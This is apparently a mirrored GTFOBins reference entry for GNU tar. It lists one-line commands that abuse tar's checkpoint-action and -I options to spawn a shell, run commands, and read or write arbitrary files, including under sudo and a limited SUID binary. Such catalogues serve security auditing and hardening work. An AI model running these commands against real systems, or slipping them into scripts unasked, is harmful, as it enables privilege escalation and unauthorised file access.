mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 14:59:44 +01:00
25 lines
799 B
Markdown
25 lines
799 B
Markdown
---
|
|
functions:
|
|
shell:
|
|
- code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
|
command:
|
|
- description: This only works for GNU tar.
|
|
code: tar xf /dev/null -I '/bin/sh -c "id 1>&2"'
|
|
file-write:
|
|
- description: This only works for GNU tar.
|
|
code: |
|
|
LFILE=file_to_write
|
|
TF=$(mktemp)
|
|
echo DATA > "$TF"
|
|
tar c --xform "s@.*@$LFILE@" -OP "$TF" | tar x -P
|
|
file-read:
|
|
- description: This only works for GNU tar.
|
|
code: |
|
|
LFILE=file_to_read
|
|
tar xf "$LFILE" -I '/bin/sh -c "cat 1>&2"'
|
|
sudo:
|
|
- code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
|
limited-suid:
|
|
- code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
|
---
|